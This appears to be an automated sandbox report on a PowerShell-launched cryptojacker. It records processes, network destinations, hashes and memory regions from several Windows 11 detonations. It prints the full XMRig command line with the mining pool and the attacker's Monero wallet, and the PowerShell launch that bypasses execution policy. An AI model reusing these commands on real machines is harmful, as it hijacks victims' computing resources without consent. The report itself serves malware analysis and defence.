"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2132,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/1328-0-0x00007FF939B93000-0x00007FF939B95000-memory.dmp
memory/1328-1-0x0000021647DB0000-0x0000021647DD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3njdkivh.eec.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1328-11-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-12-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-14-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-15-0x0000021647DE0000-0x0000021647DF2000-memory.dmp
memory/1328-16-0x0000021647D10000-0x0000021647D1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2076-47-0x0000020D54DF0000-0x0000020D54E10000-memory.dmp
memory/2076-48-0x0000020DE8D60000-0x0000020DE8D80000-memory.dmp
memory/2076-49-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-51-0x0000020DE91A0000-0x0000020DE91C0000-memory.dmp
memory/1328-52-0x00007FF939B93000-0x00007FF939B95000-memory.dmp
memory/2076-50-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/1328-53-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/2076-54-0x0000020DE93D0000-0x0000020DE93F0000-memory.dmp
memory/2076-55-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-57-0x0000020DE91A0000-0x0000020DE91C0000-memory.dmp
memory/2076-56-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-58-0x0000020DE93D0000-0x0000020DE93F0000-memory.dmp
memory/2076-59-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-60-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-61-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-62-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-63-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-64-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-65-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-66-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-67-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-68-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-69-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-70-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-71-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-72-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-73-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-74-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-75-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-76-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-77-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-78-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-79-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-80-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-81-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-82-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-83-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-84-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-85-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-86-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-87-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-88-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-89-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-90-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-91-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-92-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-93-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-94-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-95-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-96-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-97-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-98-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-99-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-100-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-101-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-102-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-103-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-104-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-105-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-106-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-107-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-108-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-109-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-110-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-111-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-112-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-113-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-114-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-115-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-116-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-117-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:25
Platform
win11-20240508-en
Max time kernel
1790s
Max time network
1762s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1216 wrote to memory of 4068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1216 wrote to memory of 4068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1216-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fhj1x2ab.b55.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1216-9-0x00000212B5FF0000-0x00000212B6012000-memory.dmp
memory/1216-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/1216-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/1216-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/1216-14-0x00000212B64B0000-0x00000212B64C2000-memory.dmp
memory/1216-15-0x00000212B6120000-0x00000212B612A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4068-46-0x000002AFC14B0000-0x000002AFC14D0000-memory.dmp
memory/4068-47-0x000002AFC2FC0000-0x000002AFC2FE0000-memory.dmp
memory/4068-48-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/1216-49-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
memory/1216-50-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/4068-53-0x000002AFC3000000-0x000002AFC3020000-memory.dmp
memory/4068-51-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-52-0x000002AFC2FE0000-0x000002AFC3000000-memory.dmp
memory/1216-54-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/4068-55-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-56-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-58-0x000002AFC3000000-0x000002AFC3020000-memory.dmp
memory/4068-57-0x000002AFC2FE0000-0x000002AFC3000000-memory.dmp
memory/4068-59-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-60-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-61-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-62-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-63-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-64-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-65-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-66-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-67-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-68-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-69-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-70-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-71-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-72-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-73-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-74-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-75-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-76-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-77-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-78-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-79-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-80-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-81-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-82-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-83-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-84-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-85-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-86-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-87-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-88-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-89-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-90-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-91-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-92-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-93-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-94-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-95-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-96-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-97-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-98-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-99-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-100-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-101-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-102-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-103-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-104-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-105-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-106-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-107-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-108-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-109-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-110-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-111-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-112-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-113-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-114-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-115-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-116-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-117-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:44
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 764 wrote to memory of 2220 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 764 wrote to memory of 2220 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/764-0-0x00007FFAF1663000-0x00007FFAF1665000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fknoqrww.eo1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/764-9-0x000002CF23790000-0x000002CF237B2000-memory.dmp
memory/764-10-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-11-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-12-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-14-0x000002CF23C90000-0x000002CF23CA2000-memory.dmp
memory/764-15-0x000002CF23B80000-0x000002CF23B8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2220-46-0x000001A392E30000-0x000001A392E50000-memory.dmp
memory/2220-47-0x000001A392F80000-0x000001A392FA0000-memory.dmp
memory/2220-48-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-49-0x000001A392FA0000-0x000001A392FC0000-memory.dmp
